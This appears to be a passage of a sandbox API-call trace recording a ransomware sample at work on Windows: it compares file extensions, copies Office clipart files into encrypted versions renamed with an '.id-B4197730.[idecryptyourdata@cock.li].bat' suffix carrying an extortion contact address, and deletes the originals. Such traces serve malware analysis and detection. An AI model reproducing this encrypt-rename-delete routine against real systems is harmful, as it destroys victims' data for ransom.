[0183.267] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.267] lstrlenW (lpString=".7z") returned 3 [0183.267] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.267] lstrlenW (lpString=".dbf") returned 4 [0183.267] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.267] lstrlenW (lpString=".1cd") returned 4 [0183.267] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.267] lstrlenW (lpString=".jpg") returned 4 [0183.267] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.268] lstrlenW (lpString=".doc") returned 4 [0183.268] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString=".docx") returned 5 [0183.268] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0183.268] lstrlenW (lpString=".pdf") returned 4 [0183.268] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString=".xls") returned 4 [0183.268] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.268] lstrlenW (lpString=".xlsx") returned 5 [0183.268] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0183.268] lstrlenW (lpString=".ppt") returned 4 [0183.268] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.268] lstrlenW (lpString=".zip") returned 4 [0183.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.268] lstrlenW (lpString=".rar") returned 4 [0183.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString=".bz2") returned 4 [0183.268] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString=".7z") returned 3 [0183.268] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.268] lstrlenW (lpString=".dbf") returned 4 [0183.268] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.268] lstrlenW (lpString=".1cd") returned 4 [0183.268] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 68 [0183.268] lstrlenW (lpString=".jpg") returned 4 [0183.269] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.269] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.269] lstrlenW (lpString="J0107314.WMF") returned 12 [0183.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.269] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=10852) returned 1 [0183.269] CloseHandle (hObject=0x360) returned 1 [0183.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf")) returned 0x220 [0183.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.270] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.270] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0183.270] GetLastError () returned 0x0 [0183.270] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2a64, lpOverlapped=0x0) returned 1 [0183.272] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2a70, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2a70, lpOverlapped=0x0) returned 1 [0183.274] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0183.274] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0183.274] SetEndOfFile (hFile=0x368) returned 1 [0183.275] CloseHandle (hObject=0x368) returned 1 [0183.275] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.275] SetEndOfFile (hFile=0x360) returned 1 [0183.276] CloseHandle (hObject=0x360) returned 1 [0183.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.276] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107314.wmf")) returned 1 [0183.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.276] lstrlenW (lpString=".doc") returned 4 [0183.277] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.277] lstrlenW (lpString=".docx") returned 5 [0183.277] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0183.277] lstrlenW (lpString=".pdf") returned 4 [0183.277] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.277] lstrlenW (lpString=".xls") returned 4 [0183.277] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.277] lstrlenW (lpString=".xlsx") returned 5 [0183.277] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0183.277] lstrlenW (lpString=".ppt") returned 4 [0183.277] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.277] lstrlenW (lpString=".zip") returned 4 [0183.277] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.277] lstrlenW (lpString=".rar") returned 4 [0183.277] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.277] lstrlenW (lpString=".bz2") returned 4 [0183.277] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.277] lstrlenW (lpString=".7z") returned 3 [0183.277] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.277] lstrlenW (lpString=".dbf") returned 4 [0183.277] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.277] lstrlenW (lpString=".1cd") returned 4 [0183.277] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.277] lstrlenW (lpString=".jpg") returned 4 [0183.277] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.278] lstrlenW (lpString=".doc") returned 4 [0183.278] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString=".docx") returned 5 [0183.278] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0183.278] lstrlenW (lpString=".pdf") returned 4 [0183.278] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString=".xls") returned 4 [0183.278] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.278] lstrlenW (lpString=".xlsx") returned 5 [0183.278] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0183.278] lstrlenW (lpString=".ppt") returned 4 [0183.278] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.278] lstrlenW (lpString=".zip") returned 4 [0183.278] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.278] lstrlenW (lpString=".rar") returned 4 [0183.278] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString=".bz2") returned 4 [0183.278] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString=".7z") returned 3 [0183.278] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.278] lstrlenW (lpString=".dbf") returned 4 [0183.278] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.278] lstrlenW (lpString=".1cd") returned 4 [0183.278] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107314.WMF") returned 68 [0183.279] lstrlenW (lpString=".jpg") returned 4 [0183.279] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.279] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.279] lstrlenW (lpString="J0107316.WMF") returned 12 [0183.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.280] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=11288) returned 1 [0183.280] CloseHandle (hObject=0x360) returned 1 [0183.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf")) returned 0x220 [0183.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.280] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.280] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0183.281] GetLastError () returned 0x0 [0183.281] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2c18, lpOverlapped=0x0) returned 1 [0183.283] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2c20, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2c20, lpOverlapped=0x0) returned 1 [0183.284] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0183.284] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0183.285] SetEndOfFile (hFile=0x368) returned 1 [0183.285] CloseHandle (hObject=0x368) returned 1 [0183.285] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.285] SetEndOfFile (hFile=0x360) returned 1 [0183.286] CloseHandle (hObject=0x360) returned 1 [0183.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.286] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107316.wmf")) returned 1 [0183.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.287] lstrlenW (lpString=".doc") returned 4 [0183.287] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.287] lstrlenW (lpString=".docx") returned 5 [0183.287] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0183.287] lstrlenW (lpString=".pdf") returned 4 [0183.287] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.287] lstrlenW (lpString=".xls") returned 4 [0183.287] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.287] lstrlenW (lpString=".xlsx") returned 5 [0183.287] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0183.287] lstrlenW (lpString=".ppt") returned 4 [0183.287] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.287] lstrlenW (lpString=".zip") returned 4 [0183.287] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.287] lstrlenW (lpString=".rar") returned 4 [0183.287] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.287] lstrlenW (lpString=".bz2") returned 4 [0183.287] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.287] lstrlenW (lpString=".7z") returned 3 [0183.287] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.287] lstrlenW (lpString=".dbf") returned 4 [0183.287] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.288] lstrlenW (lpString=".1cd") returned 4 [0183.288] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.288] lstrlenW (lpString=".jpg") returned 4 [0183.288] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.288] lstrlenW (lpString=".doc") returned 4 [0183.288] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.288] lstrlenW (lpString=".docx") returned 5 [0183.288] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0183.288] lstrlenW (lpString=".pdf") returned 4 [0183.288] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.288] lstrlenW (lpString=".xls") returned 4 [0183.288] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.288] lstrlenW (lpString=".xlsx") returned 5 [0183.288] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0183.288] lstrlenW (lpString=".ppt") returned 4 [0183.288] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.288] lstrlenW (lpString=".zip") returned 4 [0183.288] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.288] lstrlenW (lpString=".rar") returned 4 [0183.288] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.288] lstrlenW (lpString=".bz2") returned 4 [0183.288] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.288] lstrlenW (lpString=".7z") returned 3 [0183.288] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.289] lstrlenW (lpString=".dbf") returned 4 [0183.289] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.289] lstrlenW (lpString=".1cd") returned 4 [0183.289] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107316.WMF") returned 68 [0183.289] lstrlenW (lpString=".jpg") returned 4 [0183.289] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.289] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.289] lstrlenW (lpString="J0107328.WMF") returned 12 [0183.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.290] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=6532) returned 1 [0183.290] CloseHandle (hObject=0x360) returned 1 [0183.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf")) returned 0x220 [0183.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.290] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.290] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0183.291] GetLastError () returned 0x0 [0183.291] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1984, lpOverlapped=0x0) returned 1 [0183.293] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1990, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1990, lpOverlapped=0x0) returned 1 [0183.294] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0183.294] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0183.294] SetEndOfFile (hFile=0x368) returned 1 [0183.294] CloseHandle (hObject=0x368) returned 1 [0183.295] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.295] SetEndOfFile (hFile=0x360) returned 1 [0183.298] CloseHandle (hObject=0x360) returned 1 [0183.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.299] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf")) returned 1 [0183.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.299] lstrlenW (lpString=".doc") returned 4 [0183.299] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.299] lstrlenW (lpString=".docx") returned 5 [0183.299] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0183.299] lstrlenW (lpString=".pdf") returned 4 [0183.299] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.299] lstrlenW (lpString=".xls") returned 4 [0183.299] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.299] lstrlenW (lpString=".xlsx") returned 5 [0183.299] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0183.299] lstrlenW (lpString=".ppt") returned 4 [0183.299] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.299] lstrlenW (lpString=".zip") returned 4 [0183.299] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.299] lstrlenW (lpString=".rar") returned 4 [0183.300] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.300] lstrlenW (lpString=".bz2") returned 4 [0183.300] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.300] lstrlenW (lpString=".7z") returned 3 [0183.300] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.300] lstrlenW (lpString=".dbf") returned 4 [0183.300] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.300] lstrlenW (lpString="C:\\Program Files\\Microsoft 